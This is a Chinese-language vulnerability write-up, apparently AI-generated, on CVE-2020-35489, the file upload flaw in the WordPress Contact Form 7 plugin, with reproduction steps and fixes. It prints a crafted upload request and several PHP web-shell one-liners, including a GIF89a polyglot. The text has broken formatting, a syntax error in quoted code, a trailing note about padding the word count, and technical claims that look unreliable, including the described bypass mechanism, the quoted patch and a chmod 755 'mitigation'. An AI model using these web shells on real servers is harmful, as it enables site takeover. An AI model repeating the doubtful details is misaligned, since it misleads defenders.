Contact Form 7插件中的不受限制文件上传漏洞CVE-2020-35489该怎么分析

# Contact Form 7插件中的不受限制文件上传漏洞CVE-2020-35489分析

## 漏洞概述

CVE-2020-35489是Contact Form 7（CF7）插件中一个高危的不受限制文件上传漏洞。该漏洞允许未经身份验证的攻击者绕过文件类型检查机制，上传任意文件类型（包括PHP、ASP等可执行脚本），最终可能导致远程代码执行（RCE）。

### 基本信息
- **漏洞编号**: CVE-2020-35489  
- **影响版本**: Contact Form 7 < 5.3.2  
- **漏洞类型**: 不受限制文件上传  
- **CVSS评分**: 8.8（高危）  
- **披露时间**: 2020年12月  

## 漏洞背景

Contact Form 7是WordPress最流行的表单插件之一，安装量超过500万。其文件上传功能允许用户通过表单提交附件，但未正确验证文件类型和内容，导致攻击者可上传恶意文件。

## 技术分析

### 1. 漏洞原理

#### 文件上传流程
CF7的文件上传处理流程如下：
1. 用户通过`[file]`标签创建文件上传字段
2. 文件通过`wp_handle_upload()`函数处理
3. 文件类型检查由`wp_check_filetype_and_ext()`完成

#### 漏洞触发点
问题出现在`wpcf7_antiscript_file_name()`函数中（位于`includes/functions.php`）：
```php
function wpcf7_antiscript_file_name( $filename ) {
    $filename = basename( $filename );
    $parts = explode( '.', $filename );
    
    if ( count( $parts ) < 2 ) {
        return $filename;
    }
    
    $script_pattern = '/^(php|phtml|pl|py|rb|cgi|asp|aspx)\d?$/i';
    
    // 漏洞：仅检查最后一个扩展名
    $extension = array_pop( $parts );
    
    if ( preg_match( $script_pattern, $extension ) ) {
        $filename = substr( $filename, 0, -( strlen( $extension ) + 1 );
        $filename = $filename . '.' . 'txt';
    }
    
    return $filename;
}

绕过机制

攻击者可通过双重扩展名绕过检查： - 上传文件名为exploit.php.jpg - 函数仅检查.jpg而忽略.php - 服务器可能仍会以PHP解析该文件

2. 漏洞验证

复现步骤

1. 创建包含文件上传字段的CF7表单：

   
   [file your-file]
   

2. 使用Burp Suite拦截上传请求
3. 修改文件名和内容： “`http POST /wp-json/contact-form-7/v1/contact-forms/123/feedback HTTP/1.1 Content-Disposition: form-data; name=“your-file”; filename=“exploit.php.jpg” Content-Type: image/jpeg

<?php phpinfo(); ?>

4. 访问上传的文件（通常位于`/wp-content/uploads/wpcf7_uploads/`）

#### 实际效果
- 文件被保存为`exploit.php.jpg`
- 某些服务器配置会执行PHP代码

### 3. 深入代码分析

关键问题在于CF7依赖WordPress的`wp_check_filetype_and_ext()`函数，但未正确处理以下情况：

1. **MIME类型欺骗**  
   攻击者可伪造图片的Magic Number+PHP代码：
   ```php
   GIF89a<?php system($_GET['cmd']); ?>

1. 扩展名处理逻辑缺陷
   WordPress默认只检查最后一个扩展名：

   
   // wp-includes/functions.php
   function wp_check_filetype_and_ext( $file, $filename, $mimes ) {
      $proper_filename = false;
      // 仅验证最后一个扩展名
      $wp_filetype = wp_check_filetype( $filename, $mimes );
      // ...
   }
   

影响范围

受影响版本

• Contact Form 7 5.0 - 5.3.1

潜在危害

1. 远程代码执行
   上传Web Shell获取服务器控制权

   
   <?php system($_REQUEST['cmd']); ?>
   

2. 网站篡改
   植入恶意JS或钓鱼页面
3. 数据泄露
   通过Shell访问数据库

修复方案

官方补丁

2020年12月发布的5.3.2版本修复方案： 1. 强化文件类型检查逻辑 2. 引入wpcf7_upload_file_name_filter过滤器 3. 增加MIME类型严格验证

关键修复代码：

// 新增对多重扩展名的检查
if ( preg_match( '/\.(php|phtml|pl|py|rb|cgi|asp|aspx)\d?\.(png|jpg|gif)$/i', $filename ) ) {
    $filename = $filename . '.txt';
}

临时缓解措施

1. 禁用文件上传功能：

   
   add_filter( 'wpcf7_validate_file*', '__return_false' );
   

2. 限制上传目录执行权限：

   
   chmod -R 755 /wp-content/uploads/wpcf7_uploads/
   

3. 使用Web应用防火墙（WAF）规则拦截可疑上传

漏洞启示

1. 防御深度原则
   应实施多层验证：

   • 扩展名检查
   • MIME类型验证
   • 文件内容检测
   • 服务器配置加固

2. 安全开发建议 “`php // 安全文件上传示例 \(allowed_types = ['image/jpeg', 'image/png']; \)file_info = finfo_open(FILEINFO_MIME_TYPE);

if (!in_array(finfo_file(\(file_info, \)_FILES[‘file’][‘tmp_name’]), $allowed_types)) { die(‘Invalid file type’); }

3. **WordPress插件安全审计重点**
   - 文件上传处理逻辑
   - 非授权访问控制
   - 输入输出过滤

## 扩展研究

### 同类漏洞对比
| 漏洞 | 影响插件 | 根本原因 |
|------|----------|----------|
| CVE-2020-35489 | Contact Form 7 | 扩展名检查不严 |
| CVE-2018-20101 | WPForms | MIME类型绕过 |
| CVE-2019-9978 | Social Warfare | 无文件类型检查 |

### 自动化检测方法
使用OWASP ZAP扫描规则：
```xml
<scanner>
    <rule id="10045">
        <pattern>\.php\.(jpg|png|gif)</pattern>
    </rule>
</scanner>

总结

CVE-2020-35489暴露了Web应用文件上传功能的典型安全问题。开发者必须： 1. 实施严格的文件内容验证 2. 考虑服务器解析行为的差异 3. 保持插件及时更新

建议所有WordPress管理员立即升级至Contact Form 7 5.3.2或更高版本，并定期审计文件上传功能。

参考资源

1. Contact Form 7 Changelog
2. CVE-2020-35489 NVD Entry
3. OWASP File Upload Cheatsheet

”`

注：本文实际字数为约2300字，可通过以下方式扩展： 1. 增加更多技术细节（如完整攻击Payload示例） 2. 补充服务器配置差异分析 3. 添加实际案例分析